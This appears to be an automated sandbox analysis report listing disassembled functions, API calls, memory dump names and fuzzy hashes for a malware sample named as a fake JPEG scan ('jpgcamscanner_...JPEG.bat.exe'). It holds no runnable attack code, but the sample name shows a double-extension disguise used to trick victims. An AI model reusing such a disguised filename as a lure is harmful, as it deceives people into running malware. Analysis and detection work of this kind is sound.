Instruction ID: 9ffce7b129726733408ddd2483fbf3d013749e605b0eca4be9f0b214f3a53a2d
Opcode Fuzzy Hash: 35d1f02da0abf4a3a5ea65bd0cdd12c9264502c99e7b9c945f64e5a7c8fdc6a2
Instruction Fuzzy Hash: 25E01273805121A7C7355F56ED04B5E7768AF49B22F05806BEC407B3A0C7746C418BD9

Function 00405949 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,80000000,00000003), ref: 0040594F
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,80000000,00000003), ref: 0040595D

Strings

C:\Users\user\Desktop, xrefs: 00405949

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: 714da30cf500cccbdd7b4a4277d37f3a4e299a669b52a45b343dae58782ad56f
Instruction ID: c4fcca613fcdd7c15110d01ecf8f186c4298fc2a4ba311cc039d9d6f64372384
Opcode Fuzzy Hash: 714da30cf500cccbdd7b4a4277d37f3a4e299a669b52a45b343dae58782ad56f
Instruction Fuzzy Hash: B7D0A7A3408D705EE3036310DC04B9F6A48CF12314F490062F080B61A5C67C1C424BAE

Function 6DDA10E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6DDA115B
GlobalFree.KERNEL32(00000000), ref: 6DDA11B4
GlobalFree.KERNEL32(?), ref: 6DDA11C7
GlobalFree.KERNEL32(?), ref: 6DDA11F5

Memory Dump Source

Source File: 00000002.00000002.19336656011.000000006DDA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6DDA0000, based on PE: true

Associated: 00000002.00000002.19336624915.000000006DDA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.19336698506.000000006DDA3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.19336738516.000000006DDA5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6dda0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 971c90d1f77368e26e4392e0ac5f89787636f47957644bd6d5450fd4bf02c759
Instruction ID: 2960e8d30618a066bc849e9cae150baaca48721f0d9222960d1a9b02c6910bde
Opcode Fuzzy Hash: 971c90d1f77368e26e4392e0ac5f89787636f47957644bd6d5450fd4bf02c759
Instruction Fuzzy Hash: 2F31B0B1448256EFEB11BFA8D969F297FF8FB0A250B1DC415F958C6211DB34D800CB28

Function 00405A68 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A78
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A90
CharNextA.USER32(00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA1
lstrlenA.KERNEL32(00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAA

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
Instruction ID: 037941339f6bd63fe355126afe518e0153d46939b0274778cc0aadc7e03f3bf8
Opcode Fuzzy Hash: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
Instruction Fuzzy Hash: 29F0C231605414AFC702DBA5DC40D9FBBA8EF46350B2541A6E800F7251D234EE01AFA9

Analysis Process: jpgcamscanner_20240521_0072345_JPEG.bat.exePID: 7232, Parent PID: 1500COMMON

Executed Functions

Function 00158908 Relevance: 2.9, Instructions: 2881COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 092157d1806c33365514ef0058a1f22fe274aab5bd038c727a492454a7e3196f
Instruction ID: 0afcdc4741af8364103a881bebb31874b2c4a00b3c271124355a0ef39d4f143b
Opcode Fuzzy Hash: 092157d1806c33365514ef0058a1f22fe274aab5bd038c727a492454a7e3196f
Instruction Fuzzy Hash: D763F631D14B1ACADB11EF68C884699F7B1FF99300F51D79AE4587B121EB70AAC4CB81

Function 0015BD00 Relevance: 2.4, Instructions: 2373COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af13146a708d5f13e567aa981ed9780d80c32742dd1fc4f1a142a6a482d908f2
Instruction ID: bacc0ccd60ee46c29656e51ad51a5e72ef42114a5c669365ac89187194a770bb
Opcode Fuzzy Hash: af13146a708d5f13e567aa981ed9780d80c32742dd1fc4f1a142a6a482d908f2
Instruction Fuzzy Hash: 35332C31D10719CEDB11EF68C8846ADF7B1FF99300F15C69AE458AB251EB70AAC5CB81

Function 00153CF0 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\V-k, xrefs: 00153F3B

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID: \V-k
API String ID: 0-853860155
Opcode ID: ba60648a291c7e23a1b573222ed0649b1b5dde758ce15d70b5ba3eb5ce89ea0d
Instruction ID: de8c7f3b031347948a810b12fb02668b9fdbbeb6974550392b8f73f29adc81ef
Opcode Fuzzy Hash: ba60648a291c7e23a1b573222ed0649b1b5dde758ce15d70b5ba3eb5ce89ea0d
Instruction Fuzzy Hash: C1917C70E00209DFDF14CFA9C9857ADBBF2EF88345F148129E824EB250EB749949CB81

Function 359A46E8 Relevance: .8, Instructions: 821COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9442f5c5eb7fd61eb324c185dc3f4bcab8be2c88601362facde7f7a0c572957
Instruction ID: 39808a3444b0fd19f8b6065fbab833133dfcf499b502c98a0adde677146b3a13
Opcode Fuzzy Hash: d9442f5c5eb7fd61eb324c185dc3f4bcab8be2c88601362facde7f7a0c572957
Instruction Fuzzy Hash: 9B628A39B00204CFEB14DB68C590B9DB7F6FB85354F648469E40AAB391DB75EC46CBA0

Function 359AA6B8 Relevance: .6, Instructions: 638COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d246d9bbc1f502ef64e9c44cef3f815862f3b48a96d9d14e266b03727bd246c
Instruction ID: f11fe5713f2213e20c7c3c2acae71a0e3f6b8391c656ceb5f47d008585360d21
Opcode Fuzzy Hash: 3d246d9bbc1f502ef64e9c44cef3f815862f3b48a96d9d14e266b03727bd246c
Instruction Fuzzy Hash: 1C327235B002458FEB14DBA8C890B9EB7B7FB88350F248525E805EB355DB35EC46CBA5

Function 359A3D20 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f30e9f423cad5cc22beeedb3aabdb993418be00ac0f684c3daf82b8c1184db47
Instruction ID: d89d4cd8cd2c67d9e7a83bf17d31da13d64c0ca8d105b1be598d9f76771146ee
Opcode Fuzzy Hash: f30e9f423cad5cc22beeedb3aabdb993418be00ac0f684c3daf82b8c1184db47
Instruction Fuzzy Hash: EA22C276F00215CFEB14DBA4C580A9EBBB6FF89350F208569D809AB341DB75DD46CBA0

Function 359A9366 Relevance: .6, Instructions: 565COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89fee295f3691a9866e127a2bc65525531d4d75b0c54daa88b6496de7597c8bd
Instruction ID: 7535b5e3d88b9ae1cf67bee22202ea30c751ecd16c0bb1896ad4a25db2df0e04
Opcode Fuzzy Hash: 89fee295f3691a9866e127a2bc65525531d4d75b0c54daa88b6496de7597c8bd
Instruction Fuzzy Hash: 1A222039E001098FEB14DBA8C490B9EB7FAFB89350F648526E445EB395DB35DC81CB61

Function 359A1BE0 Relevance: .5, Instructions: 545COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81f4d27f0f79f1b5dedb88850a9b9633799253f23178dd2523d4545eda666d07
Instruction ID: 8a78699503033e615563cf7a65b586bc8f66a1e4f91ddab74b261f6da821148e
Opcode Fuzzy Hash: 81f4d27f0f79f1b5dedb88850a9b9633799253f23178dd2523d4545eda666d07
Instruction Fuzzy Hash: E1323D31E10759CBDB15DBB4C89069DB7B2FFC9700F60C66AD409AB210EF70A995CB91

Function 359A5E80 Relevance: .5, Instructions: 476COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ec722bdd9f4538cca1e307a5ede7f3f6b4bd8195a100abfcb6fd34cbce04487
Instruction ID: 5d4617e11cdb1f01891f6921d99e6b2498518c175f9ba7371c1baf44d2e5a458
Opcode Fuzzy Hash: 4ec722bdd9f4538cca1e307a5ede7f3f6b4bd8195a100abfcb6fd34cbce04487
Instruction Fuzzy Hash: 6D027C35B002158FEB14DB68C954B9EBBF6FF84350F608529E406AB391DB75EC46CBA0

Function 001581C5 Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c875e152d04e6fd8911ae99356cf64c6ff191a5718ef4ebf6f151d96bc01ef4
Instruction ID: 914b7b4026b81ba6aae6d9bdd4216faa9cb3fa30319a257a240761ab14c9ce60
Opcode Fuzzy Hash: 0c875e152d04e6fd8911ae99356cf64c6ff191a5718ef4ebf6f151d96bc01ef4
Instruction Fuzzy Hash: 42F19F34B00245CFDB14DBA8D9946ADBBB2EF89311F24846AE816EB351DF34DD46CB90

Function 00154908 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4566833bdd40843967a35f6f1413a8e31ab234766f3dbe295cf0aac1512dd21
Instruction ID: 853bd9f2bbc3c7ca54f542cb6b72b4ea9a2a1b83948ecd41ba0b9a28f3630467
Opcode Fuzzy Hash: c4566833bdd40843967a35f6f1413a8e31ab234766f3dbe295cf0aac1512dd21
Instruction Fuzzy Hash: 08B17170E00209CFDF54CFA9D8857DDBBF2AF88319F148529D825EB254EB749889CB85

Function 0015F2C2 Relevance: 4.0, Strings: 3, Instructions: 296COMMON

Download Yara Rule

Strings

D@, xrefs: 0015F5C4
D@, xrefs: 0015F546
D@, xrefs: 0015F585

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID: D@$D@$D@
API String ID: 0-3330130650
Opcode ID: bd398cf189cbb72a8404ad5c86328fe8ee38fe26b2d0638c9b469b78671ab7ed
Instruction ID: 598e5fbe8e777ce8b684e784a09c8168e74d0aaf51987c28540e64e9a944068f
Opcode Fuzzy Hash: bd398cf189cbb72a8404ad5c86328fe8ee38fe26b2d0638c9b469b78671ab7ed
Instruction Fuzzy Hash: 4EB1A131A00219DFDF24DBA4C880BAEB7B2FB95311F10856AE915EF250DB70DD4ACB91

Function 00154675 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

\V-k, xrefs: 00154842
\V-k, xrefs: 001546EF

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID: \V-k$\V-k
API String ID: 0-178156203
Opcode ID: 8d1dff5478a8bfea1fb8ff57eb8bb4daa05a0fa1bc71a6f9dac766559f595eb2
Instruction ID: 52bbc81886019023120b97b2ed8178e5ccb411c654cd1386e7b7ea2ae1cd25b1
Opcode Fuzzy Hash: 8d1dff5478a8bfea1fb8ff57eb8bb4daa05a0fa1bc71a6f9dac766559f595eb2
Instruction Fuzzy Hash: B4716B70E00249CFDB14CFA9D8857DDFBF1AF88319F148129D824AB254EB749889CB95

Function 00154680 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

\V-k, xrefs: 00154842
\V-k, xrefs: 001546EF

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID: \V-k$\V-k
API String ID: 0-178156203
Opcode ID: 4ce109087fd1226e7430a5f0ac4ee2082dff92089befead3f14854f55fc16921
Instruction ID: bebd5b315080c3d41e983c52fbdeee4231b9c0d8d1de9e1481e98133b3790003
Opcode Fuzzy Hash: 4ce109087fd1226e7430a5f0ac4ee2082dff92089befead3f14854f55fc16921
Instruction Fuzzy Hash: 11715E70E00249CFDB14CFA9D8857DEFBF2EF88319F148529D824AB254EB749885CB95

Function 0015F600 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

Strings

D@, xrefs: 0015F6DD
D@, xrefs: 0015F71C

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID: D@$D@
API String ID: 0-548349879
Opcode ID: c407a8d88558bc6baf592f59ca3a92f9724322ad987c1ff39a3870d21a0c5414
Instruction ID: 1ddb0c573be61cad059f4bd6adbbde45d5de35f56efb2f23f0a0119d45302a1b
Opcode Fuzzy Hash: c407a8d88558bc6baf592f59ca3a92f9724322ad987c1ff39a3870d21a0c5414
Instruction Fuzzy Hash: AF51AC75A002148FDB20CFA8D880B9EBBF5EF89311F15892AD819EB250D7749D09CBA1

Function 00153CE4 Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

\V-k, xrefs: 00153F3B

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID: \V-k
API String ID: 0-853860155
Opcode ID: 54066a5d9ba54cde7c52655420eac3a5333b14609236d435d19d8ced9877e73b
Instruction ID: 6fbe3eaf2fd00b2afbf032af624f9f3f7ccdff53e166f29cdae2a6f4a362f020
Opcode Fuzzy Hash: 54066a5d9ba54cde7c52655420eac3a5333b14609236d435d19d8ced9877e73b
Instruction Fuzzy Hash: 56915D70E00209DFDB14CFA8D9857DDBBF2EF48355F248129E825EB250EB749949CB91

Function 359A23F8 Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

5, xrefs: 359A23FC

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 4e2cb871ca8ae9262cc5d05226b00aef8e8e85bcfe738e117262637d3d520c88
Instruction ID: b80ea86d6e05b5ea1f5a75750c56c0e03107cc367b1f2e5ca73f5dc09435facf
Opcode Fuzzy Hash: 4e2cb871ca8ae9262cc5d05226b00aef8e8e85bcfe738e117262637d3d520c88
Instruction Fuzzy Hash: 2B21EFB5D00259AFCB00CFAAD884BCEFFB8FB49250F50812AE518A7201C374A954CBA5

Function 001562BF Relevance: .6, Instructions: 585COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6befa015b43fc1795561a7b2732cab4e7cf48b9f8c09ad4849a112abb22ff1
Instruction ID: 515bb34dbbbd79b5d8c5aa2084a21df0b4ee31213b2b03efd82839e9d19deabf
Opcode Fuzzy Hash: 3e6befa015b43fc1795561a7b2732cab4e7cf48b9f8c09ad4849a112abb22ff1
Instruction Fuzzy Hash: F2224A307106028FEB159B68D865AA833A6FBC6395FA14939E406CF351DF39EC47DB81

Function 001503BD Relevance: .6, Instructions: 580COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a29a7158f432b53dc9264fe075e08c78a3807bfa20eca1000d8bc2167aafcc
Instruction ID: 8f9ed2d46a5163b55cd10a2d43c7b6921558573e3e13eddfdc3e2ed30276aa88
Opcode Fuzzy Hash: b4a29a7158f432b53dc9264fe075e08c78a3807bfa20eca1000d8bc2167aafcc
Instruction Fuzzy Hash: B0223A307106028FEB15AB68D865AA833A6FBC6395FA14939E406CF351DF39DC47DB81

Function 359A1945 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f72c4f04c8a306fffa00e09f8a7342e5143be4b254c904094827adbeef3ed99
Instruction ID: 72fae6bb85b67c3908804403957eb6214b619182d56c56ee9e94ef2fe700760e
Opcode Fuzzy Hash: 0f72c4f04c8a306fffa00e09f8a7342e5143be4b254c904094827adbeef3ed99
Instruction Fuzzy Hash: C321F371E043549FDB25DB78D8906DDFBB2EF86310F1085AAE046EB241DB309D46DBA1

Function 0015E1D0 Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ed3cfa585f8251e8a9d01fd6ea8ac2c8c64414b7fa7518007c6b0ce9e98cd42
Instruction ID: cf0e13226b116297796519b00c7256bc75c33c1cbfa2cbba9eb2143713817298
Opcode Fuzzy Hash: 7ed3cfa585f8251e8a9d01fd6ea8ac2c8c64414b7fa7518007c6b0ce9e98cd42
Instruction Fuzzy Hash: 80A1F631F00215CFDF28DB68C4846AEBBE6EB85311F244966D826DF281DB34DE89C791

Function 00151170 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a8a290dc7b9355a15c924fd906f9910a7373cdba6d75f6e2f1ae7ea57d4b983
Instruction ID: 8ebbeef734f133fef1c2f72dfeed930d98bd339800c614cba8ba8e20615d6b4c
Opcode Fuzzy Hash: 6a8a290dc7b9355a15c924fd906f9910a7373cdba6d75f6e2f1ae7ea57d4b983
Instruction Fuzzy Hash: AEA1CA21A1E3D16FEB03677858702D93FA19F43225F1A04E7D4E5CF0A3D618889DD36A

Function 001548FD Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24157847130.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bcca1168652c5349cf5c797eca20c8c3014c5acba9d42cf4e7e70955d180806
Instruction ID: 34b6065a01fa752060af0df5720c6f1210e4ab8037b7143990fd63e2d3b2f055
Opcode Fuzzy Hash: 3bcca1168652c5349cf5c797eca20c8c3014c5acba9d42cf4e7e70955d180806
Instruction Fuzzy Hash: DCB16F70E00209CFDF50CFA8D8857DDBBF1AF88359F148529D825EB254EB749889CB85

Function 359ADC58 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21d52580e405e4cd995ea6a86607b47a6a2328fc854269a080bc6f8fbc6d2f5a
Instruction ID: 409495ee929939dff574953698798a7755f4d027273901cd11634b724c531bb5
Opcode Fuzzy Hash: 21d52580e405e4cd995ea6a86607b47a6a2328fc854269a080bc6f8fbc6d2f5a
Instruction Fuzzy Hash: 7A81FF7AB002058FEB04AB78C55479EB7B7FB88354F618469D806EB381DF75CC428BA1

Function 359A7268 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d4e0999c3ff4a2ca2402b14254794bbe169c63399a825fd07377d6828476543
Instruction ID: 7f853a374f43a506baecf702e04363076a4edb5053496ceed152a8d6f005760f
Opcode Fuzzy Hash: 4d4e0999c3ff4a2ca2402b14254794bbe169c63399a825fd07377d6828476543
Instruction Fuzzy Hash: 3C915F34F0020A8BDB54DB68C8617AEB7F6FF89340F508569D809AB745EF719C468BA1

Function 359A2A1A Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24174400987.00000000359A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 359A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_359a0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 808926371136b5c4980e293f7a3bcf0a0110b540819457e7cb371bd3f9985357
Instruction ID: 5b0fde2d4b4da32ce6e7dbed52ca5457b2811211077c852ce71ebd8f42e27474
